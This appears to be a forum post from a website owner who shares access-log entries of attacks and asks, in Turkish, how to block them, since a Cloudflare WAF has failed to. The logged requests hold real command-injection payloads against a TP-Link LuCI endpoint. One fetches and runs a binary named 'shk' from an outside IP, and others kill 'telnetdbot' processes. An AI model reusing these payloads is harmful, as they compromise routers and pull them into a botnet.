141.98.83.197 - - [30/Jun/2024:18:54:36 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3 E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+ chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1057 "-" "Go-http-client/1.1"
--


141.98.83.197 - - [30/Jun/2024:18:54:36 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3 E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D% 3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%2 2%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2 Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5 B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+ %22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1057 "-" "Go-http-client/1.1"
anlık olarak bu tür saldırılar alıyorum nereden deniyor bilmiyor bu sistem açığını nasıl kapatabilirim veya nasıl engellerim cf waf ile engelleyemedim bu konu hakkında fikir sahibi olan var mı


/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(ps -ef | grep telnetdbot | grep -v grep | awk '{print $2}' | xargs -r kill -9)